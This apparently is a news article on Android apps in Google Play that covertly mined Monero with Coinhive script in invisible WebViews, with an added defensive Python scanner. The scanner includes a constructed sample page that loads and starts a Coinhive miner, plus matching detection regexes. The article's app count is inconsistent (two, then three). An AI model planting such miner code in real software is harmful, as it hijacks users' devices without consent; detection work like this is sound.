Cryptocurrency mining code found in apps on Google Play

Trend Micro researchers have spotted two apps that have been equipped with a cryptocurrency mining script.

Researchers at Trend Micro found three programs available for download in the application souk that were surreptitiously using the spare CPU cycles on people’s smartphones to mine Monero, using code built by Coinhive. The mining apps were variously disguised as a wallpaper collection, a wireless safety app, and software to help Catholics with rosary prayers.


The first (prsolutions.rosariofacileads) is an app meant to help users pray the rosary. The second (com.freemo.safetyne) allows users to “earn free Talk, Text, and Data” by racking up credits “by redeeming local coupons and deals, watching videos, taking surveys and more.” The third (com.yrchkor.newwallpaper) is a legitimate wallpaper app that has been modified to include a mining library.

“Both of these samples do the same thing once they are started: they will load the JavaScript library code from Coinhive and start mining with the attacker’s own site key,” the researchers explained.

“This JavaScript code runs within the app’s webview, but this is not visible to the user because the webview is set to run in invisible mode by default. When the malicious JavaScript code is running, the CPU usage will be exceptionally high.”
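A static triage check a defender could run for the behaviour the researchers describe: an app asset that loads the Coinhive library and starts a miner inside a WebView. This is an added example, not code from Trend Micro or the article; the indicator patterns, function names and sample archive are assumptions constructed for illustration.

```python
import io
import re
import zipfile

# Indicator patterns (assumptions: modelled on Coinhive's public embed snippet,
# not taken from the article or from the Trend Micro samples).
LIBRARY = re.compile(rb"coinhive(\.min)?\.js", re.I)
MINER_START = re.compile(rb"CoinHive\.(Anonymous|User|Token)\s*\(", re.I)
# Text-like entries plus DEX files, whose string tables hold ASCII as plain bytes.
SCANNED = (".html", ".htm", ".js", ".dex", ".xml", ".json")


def scan_apk(apk_bytes):
    """Return {entry_name: [reasons]} for APK entries that reference the miner."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:  # an APK is a zip archive
        for info in apk.infolist():
            if not info.filename.lower().endswith(SCANNED):
                continue
            data = apk.read(info)
            reasons = []
            if LIBRARY.search(data):
                reasons.append("loads-coinhive-library")
            if MINER_START.search(data):
                reasons.append("instantiates-miner")
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_apk():
    """Constructed sample: a zip laid out like an APK, not a real app."""
    page = (b'<html><body><script src="https://coinhive.com/lib/coinhive.min.js">'
            b'</script><script>new CoinHive.Anonymous("SITE_KEY_PLACEHOLDER")'
            b'.start();</script></body></html>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("assets/engine.html", page)
        z.writestr("assets/help.html", b"<html><body>How to pray</body></html>")
        z.writestr("res/raw/logo.png", b"coinhive.min.js")  # skipped: not scanned type
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in scan_apk(build_sample_apk()).items():
        print(name, reasons)
```

A hit only shows that the strings are present; confirming the behaviour still requires reviewing how the app's WebView loads the flagged asset.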

The first two apps have been pulled from Google Play, and the accounts of their developers have apparently been removed or suspended. They can still be downloaded from some third-party Android stores.
